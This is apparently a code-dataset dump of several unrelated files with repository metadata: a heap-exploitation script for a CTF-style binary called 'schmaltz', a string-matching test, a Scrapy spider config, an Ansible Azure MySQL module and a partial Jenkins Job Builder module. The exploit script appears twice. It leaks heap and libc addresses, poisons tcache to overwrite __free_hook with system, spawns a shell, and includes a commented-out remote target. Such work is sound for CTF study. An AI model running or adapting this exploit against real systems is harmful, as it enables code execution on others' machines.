] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | from ptrlib import *
def add(size, data):
sock.sendlineafter("> ", "1")
sock.sendlineafter("> ", str(size))
if size > 0:
sock.sendafter("> ", data)
return
def view(index):
sock.sendlineafter("> ", "3")
sock.sendlineafter("> ", str(index))
sock.recvuntil("Content: ")
return sock.recvline()
def delete(index):
sock.sendlineafter("> ", "4")
sock.sendlineafter("> ", str(index))
return
def offset(address):
    """Translate a 0x10-aligned heap address into its slot index in the note table."""
    base = 0x602060
    assert address % 0x10 == 0
    return (address - base) >> 4
libc = ELF("./libc.so.6")
elf = ELF("./schmaltz")
sock = Process(["./schmaltz"], env={"LD_LIBRARY_PATH": "./"})
#sock = Socket("52.23.219.15", 1337)
libc_main_arena = 0x3b0c40
magic01 = 0x105ae0
one_gadget = 0x41aca
# leak heap address
add(0x28, "A") # 0
add(0x28, "B") # 1
delete(1)
delete(0)
add(0x28, "\x60") # 0
addr_heap = u64(view(0))
logger.info("addr_heap = " + hex(addr_heap))
delete(0)
# leak libc address
add(0x38, "0") # 0
add(0x108, "A") # 1
delete(0)
delete(1)
add(0x38, b'0' * 0x38) # 0
delete(1)
add(0xf8, p64(addr_heap + 0xc0) + p64(0)*2 + p64(0x431)) # 0
add(0x108, "A") # 1
add(0x108, "target") # 2
add(0x1e0, "X" * 0x1df) # 3
add(0x1e0, (p64(0) + p64(0x21)) * 0x1d) # 4
delete(3)
delete(4)
add(0x48, "1" * 0x40) # 3: prepare for next
add(0x200, "B") # 4
delete(4)
delete(3)
delete(2) # link to unsorted bin
delete(0)
add(0x38, "\x90") # 0
libc_base = u64(view(1)) - libc_main_arena - 1104
logger.info("libc = " + hex(libc_base))
# tcache poisoning
add(0x48, "X" * 0x40) # 2
add(0x28, "count up")
delete(4)
add(0x1f8, p64(libc_base + libc.symbol("__free_hook")))
add(0x200, "/bin/sh")
add(0x200, p64(libc_base + libc.symbol("system")))
# get the shell!
delete(3)
sock.interactive()
| 22 | 61 | 0.623705 | from ptrlib import *
def add(size, data):
sock.sendlineafter("> ", "1")
sock.sendlineafter("> ", str(size))
if size > 0:
sock.sendafter("> ", data)
return
def view(index):
sock.sendlineafter("> ", "3")
sock.sendlineafter("> ", str(index))
sock.recvuntil("Content: ")
return sock.recvline()
def delete(index):
sock.sendlineafter("> ", "4")
sock.sendlineafter("> ", str(index))
return
def offset(address):
assert address % 0x10 == 0
return (address - 0x602060) // 0x10
libc = ELF("./libc.so.6")
elf = ELF("./schmaltz")
sock = Process(["./schmaltz"], env={"LD_LIBRARY_PATH": "./"})
libc_main_arena = 0x3b0c40
magic01 = 0x105ae0
one_gadget = 0x41aca
add(0x28, "A")
add(0x28, "B")
delete(1)
delete(0)
add(0x28, "\x60")
addr_heap = u64(view(0))
logger.info("addr_heap = " + hex(addr_heap))
delete(0)
add(0x38, "0")
add(0x108, "A")
delete(0)
delete(1)
add(0x38, b'0' * 0x38)
delete(1)
add(0xf8, p64(addr_heap + 0xc0) + p64(0)*2 + p64(0x431))
add(0x108, "A")
add(0x108, "target")
add(0x1e0, "X" * 0x1df)
add(0x1e0, (p64(0) + p64(0x21)) * 0x1d)
delete(3)
delete(4)
add(0x48, "1" * 0x40)
add(0x200, "B")
delete(4)
delete(3)
delete(2)
delete(0)
add(0x38, "\x90")
libc_base = u64(view(1)) - libc_main_arena - 1104
logger.info("libc = " + hex(libc_base))
add(0x48, "X" * 0x40)
add(0x28, "count up")
delete(4)
add(0x1f8, p64(libc_base + libc.symbol("__free_hook")))
add(0x200, "/bin/sh")
add(0x200, p64(libc_base + libc.symbol("system")))
delete(3)
sock.interactive()
| true | true |
1c3319d1b95ffbb366d5639dab284adc07453f08 | 641 | py | Python | src/test.py | erikmetzinfo/tds_db_generator | 1082a670f1ecd46c2dc7f0ebe8baccdcaf70a867 | [
"MIT"
] | null | null | null | src/test.py | erikmetzinfo/tds_db_generator | 1082a670f1ecd46c2dc7f0ebe8baccdcaf70a867 | [
"MIT"
] | null | null | null | src/test.py | erikmetzinfo/tds_db_generator | 1082a670f1ecd46c2dc7f0ebe8baccdcaf70a867 | [
"MIT"
] | null | null | null |
from general_pkg import string_comparison
from fuzzywuzzy import process as fuzzy_process
a = 'Ratio by weight ( A / B ) 100/ 9505'
a = 'Ratio by weight ( A / B ) 100/ 9505'
b = 'Ratio by weight ( A / B )'
match, match_ratio = string_comparison(a,b,max_value=95)
def special_string_comparison(string1, string2):
reverse_string2 = string2[::-1]
string1_ = string1
last_pos=0
for c in reverse_string2:
pos = string1_.rfind(c)
if pos > last_pos:
last_pos = pos
string1_ = string1_[:pos]
val = string1[last_pos + 1:].strip()
return val
val = special_string_comparison(a,b)
x=1 | 26.708333 | 56 | 0.659906 |
from general_pkg import string_comparison
from fuzzywuzzy import process as fuzzy_process
a = 'Ratio by weight ( A / B ) 100/ 9505'
a = 'Ratio by weight ( A / B ) 100/ 9505'
b = 'Ratio by weight ( A / B )'
match, match_ratio = string_comparison(a,b,max_value=95)
def special_string_comparison(string1, string2):
reverse_string2 = string2[::-1]
string1_ = string1
last_pos=0
for c in reverse_string2:
pos = string1_.rfind(c)
if pos > last_pos:
last_pos = pos
string1_ = string1_[:pos]
val = string1[last_pos + 1:].strip()
return val
val = special_string_comparison(a,b)
x=1 | true | true |
1c331a30f7049c48688de08a8d07b2dec8e1d49a | 981 | py | Python | scraper/storage_spiders/thanhhuongshoescom.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | null | null | null | scraper/storage_spiders/thanhhuongshoescom.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | 10 | 2020-02-11T23:34:28.000Z | 2022-03-11T23:16:12.000Z | scraper/storage_spiders/thanhhuongshoescom.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | 3 | 2018-08-05T14:54:25.000Z | 2021-06-07T01:49:59.000Z | # Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//h1",
'price' : "//em[@class='ProductPrice VariationProductPrice']",
'category' : "//div[@id='Breadcrumb']/ul/li/a",
'description' : "//div[@id='ProductDescription']/div[@class='ProductDescriptionContainer']/p",
'images' : "(//div[@class='ProductThumbImage']/a/@href)[1]",
'canonical' : "//link[@rel='canonical']",
'base_url' : "",
'brand' : ""
}
name = 'thanhhuongshoes.com'
allowed_domains = ['thanhhuongshoes.com']
start_urls = ['http://thanhhuongshoes.com/san-pham-p7.html']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow=['/[a-zA-Z0-9-]+-\d+\.html']), 'parse_item'),
Rule(LinkExtractor(allow=['-b\d+\.html']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
| 36.333333 | 98 | 0.651376 |
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//h1",
'price' : "//em[@class='ProductPrice VariationProductPrice']",
'category' : "//div[@id='Breadcrumb']/ul/li/a",
'description' : "//div[@id='ProductDescription']/div[@class='ProductDescriptionContainer']/p",
'images' : "(//div[@class='ProductThumbImage']/a/@href)[1]",
'canonical' : "//link[@rel='canonical']",
'base_url' : "",
'brand' : ""
}
name = 'thanhhuongshoes.com'
allowed_domains = ['thanhhuongshoes.com']
start_urls = ['http://thanhhuongshoes.com/san-pham-p7.html']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow=['/[a-zA-Z0-9-]+-\d+\.html']), 'parse_item'),
Rule(LinkExtractor(allow=['-b\d+\.html']), 'parse'),
]
| true | true |
1c331a47640bd205d642269fb7ca24e833c01fa8 | 419 | py | Python | ex011.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | ex011.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | ex011.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | """Faça um programa que leia a largura e a altura de uma parede em metros,
calcule a sua área e a quantidade de tinta necessária para pintá-la,
sabendo que cada litro de tinta pinta uma área de 2 metros quadrados."""
l = float(input('Digite a largura em metros: '))
h = float(input('Digite a altura em metros: '))
a = l * h
t = a / 2
print('A área tem {:.2f}m² e são necessários {:.2f} litros de tinta.'.format(a, t))
| 41.9 | 83 | 0.699284 |
l = float(input('Digite a largura em metros: '))
h = float(input('Digite a altura em metros: '))
a = l * h
t = a / 2
print('A área tem {:.2f}m² e são necessários {:.2f} litros de tinta.'.format(a, t))
| true | true |
1c331a4818a19d2eb248b16229fc321ce8b19a30 | 10,343 | py | Python | myven/lib/python3.8/site-packages/ansible/modules/cloud/azure/azure_rm_mysqldatabase.py | baltham/dne-dna-code | 4a13309a790a670d2f07e635c9264a0c29976c6a | [
"MIT"
] | 1 | 2021-04-02T08:08:39.000Z | 2021-04-02T08:08:39.000Z | myven/lib/python3.8/site-packages/ansible/modules/cloud/azure/azure_rm_mysqldatabase.py | baltham/dne-dna-code | 4a13309a790a670d2f07e635c9264a0c29976c6a | [
"MIT"
] | null | null | null | myven/lib/python3.8/site-packages/ansible/modules/cloud/azure/azure_rm_mysqldatabase.py | baltham/dne-dna-code | 4a13309a790a670d2f07e635c9264a0c29976c6a | [
"MIT"
] | 1 | 2020-05-03T01:13:16.000Z | 2020-05-03T01:13:16.000Z | #!/usr/bin/python
#
# Copyright (c) 2017 Zim Kalinowski, <zikalino@microsoft.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mysqldatabase
version_added: "2.5"
short_description: Manage MySQL Database instance.
description:
- Create, update and delete instance of MySQL Database.
options:
resource_group:
description:
- The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
required: True
server_name:
description:
- The name of the server.
required: True
name:
description:
- The name of the database.
required: True
charset:
description:
- The charset of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
collation:
description:
- The collation of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
force_update:
description:
- When set to C(true), will delete and recreate the existing MySQL database if any
of the properties don't match what is set.
- When set to C(false), no change will occur to the database even if any
of the properties do not match.
type: bool
default: 'no'
extends_documentation_fragment:
- azure
author:
- "Zim Kalinowski (@zikalino)"
'''
EXAMPLES = '''
- name: Create (or update) MySQL Database
azure_rm_mysqldatabase:
resource_group: TestGroup
server_name: testserver
name: db1
'''
RETURN = '''
id:
description:
- Resource ID
returned: always
type: str
sample: /subscriptions/ffffffff-ffff-ffff-ffff-ffffffffffff/resourceGroups/TestGroup/providers/Microsoft.DBforMySQL/servers/testserver/databases/db1
name:
description:
- Resource name.
returned: always
type: str
sample: db1
'''
import time
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
from azure.mgmt.rdbms.mysql import MySQLManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
    """Enumeration of the reconciliation actions the module can take."""
    NoAction = 0
    Create = 1
    Update = 2
    Delete = 3
class AzureRMDatabases(AzureRMModuleBase):
    """Configuration class for an Azure RM MySQL Database resource"""

    def __init__(self):
        self.module_arg_spec = dict(
            resource_group=dict(
                type='str',
                required=True
            ),
            server_name=dict(
                type='str',
                required=True
            ),
            name=dict(
                type='str',
                required=True
            ),
            charset=dict(
                type='str'
            ),
            collation=dict(
                type='str'
            ),
            force_update=dict(
                type='bool',
                default=False
            ),
            state=dict(
                type='str',
                default='present',
                choices=['present', 'absent']
            )
        )
        self.resource_group = None
        self.server_name = None
        self.name = None
        # BUGFIX: force_update must be pre-declared so the hasattr() check in
        # exec_module() copies the module argument onto the instance.  Without
        # it, ``self.force_update`` raised AttributeError whenever an existing
        # database needed to be recreated (upstream Ansible initializes it).
        self.force_update = None
        self.parameters = dict()
        self.results = dict(changed=False)
        self.mgmt_client = None
        self.state = None
        self.to_do = Actions.NoAction
        super(AzureRMDatabases, self).__init__(derived_arg_spec=self.module_arg_spec,
                                               supports_check_mode=True,
                                               supports_tags=False)

    def exec_module(self, **kwargs):
        """Main module execution method"""
        # Copy recognised arguments either onto the instance (simple
        # attributes) or into the API request payload (charset/collation).
        for key in list(self.module_arg_spec.keys()):
            if hasattr(self, key):
                setattr(self, key, kwargs[key])
            elif kwargs[key] is not None:
                if key == "charset":
                    self.parameters["charset"] = kwargs[key]
                elif key == "collation":
                    self.parameters["collation"] = kwargs[key]
        old_response = None
        response = None
        self.mgmt_client = self.get_mgmt_svc_client(MySQLManagementClient,
                                                    base_url=self._cloud_environment.endpoints.resource_manager)
        resource_group = self.get_resource_group(self.resource_group)
        old_response = self.get_mysqldatabase()
        if not old_response:
            self.log("MySQL Database instance doesn't exist")
            if self.state == 'absent':
                self.log("Old instance didn't exist")
            else:
                self.to_do = Actions.Create
        else:
            self.log("MySQL Database instance already exists")
            if self.state == 'absent':
                self.to_do = Actions.Delete
            elif self.state == 'present':
                self.log("Need to check if MySQL Database instance has to be deleted or may be updated")
                # charset/collation cannot be changed in place; a mismatch
                # means the database must be dropped and recreated, which is
                # only done when force_update is set.
                if ('collation' in self.parameters) and (self.parameters['collation'] != old_response['collation']):
                    self.to_do = Actions.Update
                if ('charset' in self.parameters) and (self.parameters['charset'] != old_response['charset']):
                    self.to_do = Actions.Update
                if self.to_do == Actions.Update:
                    if self.force_update:
                        if not self.check_mode:
                            self.delete_mysqldatabase()
                    else:
                        self.to_do = Actions.NoAction
        if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
            self.log("Need to Create / Update the MySQL Database instance")
            if self.check_mode:
                self.results['changed'] = True
                return self.results
            response = self.create_update_mysqldatabase()
            self.results['changed'] = True
            self.log("Creation / Update done")
        elif self.to_do == Actions.Delete:
            self.log("MySQL Database instance deleted")
            self.results['changed'] = True
            if self.check_mode:
                return self.results
            self.delete_mysqldatabase()
            # make sure instance is actually deleted, for some Azure resources, instance is hanging around
            # for some time after deletion -- this should be really fixed in Azure
            while self.get_mysqldatabase():
                time.sleep(20)
        else:
            self.log("MySQL Database instance unchanged")
            self.results['changed'] = False
            response = old_response
        if response:
            self.results["id"] = response["id"]
            self.results["name"] = response["name"]
        return self.results

    def create_update_mysqldatabase(self):
        '''
        Creates or updates MySQL Database with the specified configuration.

        :return: deserialized MySQL Database instance state dictionary
        '''
        self.log("Creating / Updating the MySQL Database instance {0}".format(self.name))
        try:
            response = self.mgmt_client.databases.create_or_update(resource_group_name=self.resource_group,
                                                                   server_name=self.server_name,
                                                                   database_name=self.name,
                                                                   parameters=self.parameters)
            # Long-running operations come back as a poller; wait for the
            # final result before reporting state.
            if isinstance(response, AzureOperationPoller):
                response = self.get_poller_result(response)
        except CloudError as exc:
            self.log('Error attempting to create the MySQL Database instance.')
            self.fail("Error creating the MySQL Database instance: {0}".format(str(exc)))
        return response.as_dict()

    def delete_mysqldatabase(self):
        '''
        Deletes specified MySQL Database instance in the specified subscription and resource group.

        :return: True
        '''
        self.log("Deleting the MySQL Database instance {0}".format(self.name))
        try:
            response = self.mgmt_client.databases.delete(resource_group_name=self.resource_group,
                                                         server_name=self.server_name,
                                                         database_name=self.name)
        except CloudError as e:
            self.log('Error attempting to delete the MySQL Database instance.')
            self.fail("Error deleting the MySQL Database instance: {0}".format(str(e)))
        return True

    def get_mysqldatabase(self):
        '''
        Gets the properties of the specified MySQL Database.

        :return: deserialized MySQL Database instance state dictionary,
            or False when the database does not exist
        '''
        self.log("Checking if the MySQL Database instance {0} is present".format(self.name))
        found = False
        try:
            response = self.mgmt_client.databases.get(resource_group_name=self.resource_group,
                                                      server_name=self.server_name,
                                                      database_name=self.name)
            found = True
            self.log("Response : {0}".format(response))
            self.log("MySQL Database instance : {0} found".format(response.name))
        except CloudError as e:
            # A CloudError here is treated as "not found"; any other failure
            # propagates to the caller.
            self.log('Did not find the MySQL Database instance.')
        if found is True:
            return response.as_dict()
        return False
def main():
    """Main execution"""
    # Instantiating the module class runs the whole Ansible module life
    # cycle; the base-class constructor parses arguments and dispatches to
    # exec_module().
    AzureRMDatabases()
if __name__ == '__main__':
    main()
| 34.824916 | 152 | 0.577202 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mysqldatabase
version_added: "2.5"
short_description: Manage MySQL Database instance.
description:
- Create, update and delete instance of MySQL Database.
options:
resource_group:
description:
- The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
required: True
server_name:
description:
- The name of the server.
required: True
name:
description:
- The name of the database.
required: True
charset:
description:
- The charset of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
collation:
description:
- The collation of the database. Check MySQL documentation for possible values.
- This is only set on creation, use I(force_update) to recreate a database if the
values don't match.
force_update:
description:
- When set to C(true), will delete and recreate the existing MySQL database if any
of the properties don't match what is set.
- When set to C(false), no change will occur to the database even if any
of the properties do not match.
type: bool
default: 'no'
extends_documentation_fragment:
- azure
author:
- "Zim Kalinowski (@zikalino)"
'''
EXAMPLES = '''
- name: Create (or update) MySQL Database
azure_rm_mysqldatabase:
resource_group: TestGroup
server_name: testserver
name: db1
'''
RETURN = '''
id:
description:
- Resource ID
returned: always
type: str
sample: /subscriptions/ffffffff-ffff-ffff-ffff-ffffffffffff/resourceGroups/TestGroup/providers/Microsoft.DBforMySQL/servers/testserver/databases/db1
name:
description:
- Resource name.
returned: always
type: str
sample: db1
'''
import time
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
from azure.mgmt.rdbms.mysql import MySQLManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
NoAction, Create, Update, Delete = range(4)
class AzureRMDatabases(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str',
required=True
),
charset=dict(
type='str'
),
collation=dict(
type='str'
),
force_update=dict(
type='bool',
default=False
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
)
)
self.resource_group = None
self.server_name = None
self.name = None
self.parameters = dict()
self.results = dict(changed=False)
self.mgmt_client = None
self.state = None
self.to_do = Actions.NoAction
super(AzureRMDatabases, self).__init__(derived_arg_spec=self.module_arg_spec,
supports_check_mode=True,
supports_tags=False)
def exec_module(self, **kwargs):
for key in list(self.module_arg_spec.keys()):
if hasattr(self, key):
setattr(self, key, kwargs[key])
elif kwargs[key] is not None:
if key == "charset":
self.parameters["charset"] = kwargs[key]
elif key == "collation":
self.parameters["collation"] = kwargs[key]
old_response = None
response = None
self.mgmt_client = self.get_mgmt_svc_client(MySQLManagementClient,
base_url=self._cloud_environment.endpoints.resource_manager)
resource_group = self.get_resource_group(self.resource_group)
old_response = self.get_mysqldatabase()
if not old_response:
self.log("MySQL Database instance doesn't exist")
if self.state == 'absent':
self.log("Old instance didn't exist")
else:
self.to_do = Actions.Create
else:
self.log("MySQL Database instance already exists")
if self.state == 'absent':
self.to_do = Actions.Delete
elif self.state == 'present':
self.log("Need to check if MySQL Database instance has to be deleted or may be updated")
if ('collation' in self.parameters) and (self.parameters['collation'] != old_response['collation']):
self.to_do = Actions.Update
if ('charset' in self.parameters) and (self.parameters['charset'] != old_response['charset']):
self.to_do = Actions.Update
if self.to_do == Actions.Update:
if self.force_update:
if not self.check_mode:
self.delete_mysqldatabase()
else:
self.to_do = Actions.NoAction
if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
self.log("Need to Create / Update the MySQL Database instance")
if self.check_mode:
self.results['changed'] = True
return self.results
response = self.create_update_mysqldatabase()
self.results['changed'] = True
self.log("Creation / Update done")
elif self.to_do == Actions.Delete:
self.log("MySQL Database instance deleted")
self.results['changed'] = True
if self.check_mode:
return self.results
self.delete_mysqldatabase()
# make sure instance is actually deleted, for some Azure resources, instance is hanging around
# for some time after deletion -- this should be really fixed in Azure
while self.get_mysqldatabase():
time.sleep(20)
else:
self.log("MySQL Database instance unchanged")
self.results['changed'] = False
response = old_response
if response:
self.results["id"] = response["id"]
self.results["name"] = response["name"]
return self.results
def create_update_mysqldatabase(self):
self.log("Creating / Updating the MySQL Database instance {0}".format(self.name))
try:
response = self.mgmt_client.databases.create_or_update(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name,
parameters=self.parameters)
if isinstance(response, AzureOperationPoller):
response = self.get_poller_result(response)
except CloudError as exc:
self.log('Error attempting to create the MySQL Database instance.')
self.fail("Error creating the MySQL Database instance: {0}".format(str(exc)))
return response.as_dict()
def delete_mysqldatabase(self):
self.log("Deleting the MySQL Database instance {0}".format(self.name))
try:
response = self.mgmt_client.databases.delete(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
except CloudError as e:
self.log('Error attempting to delete the MySQL Database instance.')
self.fail("Error deleting the MySQL Database instance: {0}".format(str(e)))
return True
def get_mysqldatabase(self):
self.log("Checking if the MySQL Database instance {0} is present".format(self.name))
found = False
try:
response = self.mgmt_client.databases.get(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
found = True
self.log("Response : {0}".format(response))
self.log("MySQL Database instance : {0} found".format(response.name))
except CloudError as e:
self.log('Did not find the MySQL Database instance.')
if found is True:
return response.as_dict()
return False
def main():
AzureRMDatabases()
if __name__ == '__main__':
main()
| true | true |
1c331b0913f847b13de2e972bc7a00bde2fbf4db | 47,483 | py | Python | jenkins_jobs/modules/project_multibranch.py | knorx/jenkins-job-builder | d15e57a14a7aa6a9de674479e1dcb904a8c09942 | [
"Apache-2.0"
] | 3 | 2019-03-03T20:15:29.000Z | 2020-11-17T18:48:27.000Z | jenkins_jobs/modules/project_multibranch.py | knorx/jenkins-job-builder | d15e57a14a7aa6a9de674479e1dcb904a8c09942 | [
"Apache-2.0"
] | null | null | null | jenkins_jobs/modules/project_multibranch.py | knorx/jenkins-job-builder | d15e57a14a7aa6a9de674479e1dcb904a8c09942 | [
"Apache-2.0"
] | 1 | 2019-02-21T22:59:17.000Z | 2019-02-21T22:59:17.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2015 Joost van der Griendt <joostvdg@gmail.com>
# Copyright (C) 2018 Sorin Sbarnea <ssbarnea@users.noreply.github.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The Multibranch Pipeline project module handles creating Jenkins workflow
projects.
You may specify ``multibranch`` in the ``project-type`` attribute of
the :ref:`Job` definition.
Multibranch Pipeline implementantion in JJB is marked as **experimental**
which means that there is no guarantee that its behavior (or configuration)
will not change, even between minor releases.
Plugins required:
* :jenkins-wiki:`Workflow Plugin <Workflow+Plugin>`.
* :jenkins-wiki:`Pipeline Multibranch Defaults Plugin
<Pipeline+Multibranch+Defaults+Plugin>` (optional)
* :jenkins-wiki:`Basic Branch Build Strategies Plugin
<Basic+Branch+Build+Strategies+Plugin>` (optional)
:Job Parameters:
* **scm** (`list`): The SCM definition.
* **bitbucket** (`dict`): Refer to
:func:`~bitbucket_scm <bitbucket_scm>` for documentation.
* **gerrit** (`dict`): Refer to
:func:`~gerrit_scm <gerrit_scm>` for documentation.
* **git** (`dict`): Refer to
:func:`~git_scm <git_scm>` for documentation.
* **github** (`dict`): Refer to
:func:`~github_scm <github_scm>` for documentation.
* **periodic-folder-trigger** (`str`): How often to scan for new branches
or pull/change requests. Valid values: 1m, 2m, 5m, 10m, 15m, 20m, 25m,
30m, 1h, 2h, 4h, 8h, 12h, 1d, 2d, 1w, 2w, 4w. (default none)
* **prune-dead-branches** (`bool`): If dead branches upon check should
result in their job being dropped. (default true)
* **number-to-keep** (`int`): How many builds should be kept.
(default '-1, all')
* **days-to-keep** (`int`): For how many days should a build be kept.
(default '-1, forever')
* **script-path** (`str`): Path to Jenkinsfile, relative to workspace.
(default 'Jenkinsfile')
Job examples:
.. literalinclude:: /../../tests/multibranch/fixtures/multibranch_defaults.yaml
.. literalinclude:: /../../tests/multibranch/fixtures/multi_scm_full.yaml
"""
import collections
import logging
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
import jenkins_jobs.modules.helpers as helpers
import six
from jenkins_jobs.modules.scm import git_extensions
from jenkins_jobs.errors import InvalidAttributeError
logger = logging.getLogger(str(__name__))
class WorkflowMultiBranch(jenkins_jobs.modules.base.Base):
    """Project type that renders a Jenkins Workflow (Pipeline) Multibranch
    project XML configuration from YAML job data.
    """
    sequence = 0
    # Java package prefix shared by the project and factory classes below.
    multibranch_path = 'org.jenkinsci.plugins.workflow.multibranch'
    jenkins_class = ''.join([multibranch_path, '.WorkflowMultiBranchProject'])
    jenkins_factory_class = ''.join(
        [multibranch_path, '.WorkflowBranchProjectFactory'])
    def root_xml(self, data):
        """Build and return the root XML element for the multibranch project.

        :arg dict data: the job definition parsed from YAML (see the module
            docstring for the supported keys).
        :returns: the populated ``xml.etree.ElementTree.Element`` root.
        :raises InvalidAttributeError: on an unknown ``scm`` type or an
            invalid ``periodic-folder-trigger`` interval.
        """
        xml_parent = XML.Element(self.jenkins_class)
        xml_parent.attrib['plugin'] = 'workflow-multibranch'
        XML.SubElement(xml_parent, 'properties')
        #########
        # Views #
        #########
        views = XML.SubElement(xml_parent, 'views')
        all_view = XML.SubElement(views, 'hudson.model.AllView')
        all_view_mapping = [
            ('', 'name', 'All'),
            ('', 'filterExecutors', False),
            ('', 'filterQueue', False),
        ]
        helpers.convert_mapping_to_xml(
            all_view, {}, all_view_mapping, fail_required=True)
        XML.SubElement(all_view, 'properties', {
            'class': 'hudson.model.View$PropertyList'
        })
        # 'reference' attributes below are XStream back-references into the
        # serialized object graph, pointing at the enclosing project element.
        XML.SubElement(all_view, 'owner', {
            'class': self.jenkins_class,
            'reference': '../../..'
        })
        XML.SubElement(xml_parent, 'viewsTabBar', {
            'class': 'hudson.views.DefaultViewsTabBar'
        })
        ################
        # Folder Views #
        ################
        folderViews = XML.SubElement(xml_parent, 'folderViews', {
            'class': 'jenkins.branch.MultiBranchProjectViewHolder',
            'plugin': 'branch-api',
        })
        XML.SubElement(folderViews, 'owner', {
            'class': self.jenkins_class,
            'reference': '../..'
        })
        ##################
        # Health Metrics #
        ##################
        hm = XML.SubElement(xml_parent, 'healthMetrics')
        hm_path = ('com.cloudbees.hudson.plugins.folder.health'
                   '.WorstChildHealthMetric')
        hm_plugin = XML.SubElement(hm, hm_path, {
            'plugin': 'cloudbees-folder',
        })
        XML.SubElement(hm_plugin, 'nonRecursive').text = 'false'
        ########
        # Icon #
        ########
        icon = XML.SubElement(xml_parent, 'icon', {
            'class': 'jenkins.branch.MetadataActionFolderIcon',
            'plugin': 'branch-api',
        })
        XML.SubElement(icon, 'owner', {
            'class': self.jenkins_class,
            'reference': '../..'
        })
        ########################
        # Orphan Item Strategy #
        ########################
        ois_default_strategy = ('com.cloudbees.hudson.plugins.'
                                'folder.computed.DefaultOrphanedItemStrategy')
        ois = XML.SubElement(
            xml_parent, 'orphanedItemStrategy', {
                'class': ois_default_strategy,
                'plugin': 'cloudbees-folder',
            }
        )
        # -1 means "keep all" / "keep forever" for the retention settings.
        ois_mapping = [
            ('prune-dead-branches', 'pruneDeadBranches', True, [True, False]),
            ('days-to-keep', 'daysToKeep', -1),
            ('number-to-keep', 'numToKeep', -1),
        ]
        helpers.convert_mapping_to_xml(ois, data, ois_mapping)
        ###########################
        # Periodic Folder Trigger #
        ###########################
        triggers = XML.SubElement(xml_parent, 'triggers')
        # Valid options for the periodic trigger interval.
        # Each entry maps the human-readable interval to a (cron spec,
        # interval in milliseconds) pair; several intervals share a cron
        # spec — presumably the millisecond interval is what Jenkins
        # actually enforces (NOTE(review): confirm against plugin docs).
        pft_map = collections.OrderedDict([
            ("1m", ("* * * * *", '60000')),
            ("2m", ("*/2 * * * *", '120000')),
            ("5m", ("*/5 * * * *", '300000')),
            ("10m", ("H/6 * * * *", '600000')),
            ("15m", ("H/6 * * * *", '900000')),
            ("20m", ("H/3 * * * *", '1200000')),
            ("25m", ("H/3 * * * *", '1500000')),
            ("30m", ("H/2 * * * *", '1800000')),
            ("1h", ("H * * * *", '3600000')),
            ("2h", ("H * * * *", '7200000')),
            ("4h", ("H * * * *", '14400000')),
            ("8h", ("H * * * *", '28800000')),
            ("12h", ("H H * * *", '43200000')),
            ("1d", ("H H * * *", '86400000')),
            ("2d", ("H H * * *", '172800000')),
            ("1w", ("H H * * *", '604800000')),
            ("2w", ("H H * * *", '1209600000')),
            ("4w", ("H H * * *", '2419200000')),
        ])
        pft_val = data.get('periodic-folder-trigger')
        if pft_val:
            if not pft_map.get(pft_val):
